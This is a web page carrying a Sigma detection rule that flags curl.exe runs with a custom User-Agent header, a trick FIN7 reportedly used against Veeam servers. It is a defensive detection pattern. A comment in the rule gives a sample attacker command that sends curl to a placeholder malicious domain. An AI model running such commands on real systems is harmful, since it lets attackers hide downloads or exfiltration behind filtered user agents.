Curl Web Request With Potential Custom User-Agent

calendar Dec 25, 2025 · attack.execution  ·
Share on: linkedin copy

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

Sigma rule (View on GitHub)

 1title: Curl Web Request With Potential Custom User-Agent
 2id: 85de1f22-d189-44e4-8239-dc276b45379b
 3status: test
 4description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
 5references:
 6    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 7    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
 8author: Nasreddine Bencherchali (Nextron Systems)
 9date: 2023-07-27
10modified: 2025-12-11
11tags:
12    - attack.execution
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    # Example: This command line would trigger the rule
18    # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
19    selection_img:
20        - Image|endswith: '\curl.exe'
21        - OriginalFileName: 'curl.exe'
22    selection_header_flag_1:
23        CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
24    selection_header_flag_2:
25        CommandLine|contains: '--header'
26    selection_user_agent:
27        CommandLine|contains: 'User-Agent:'
28    condition: selection_img and 1 of selection_header_* and selection_user_agent
29falsepositives:
30    - Unknown
31level: medium
32regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml

References

Related rules

to-top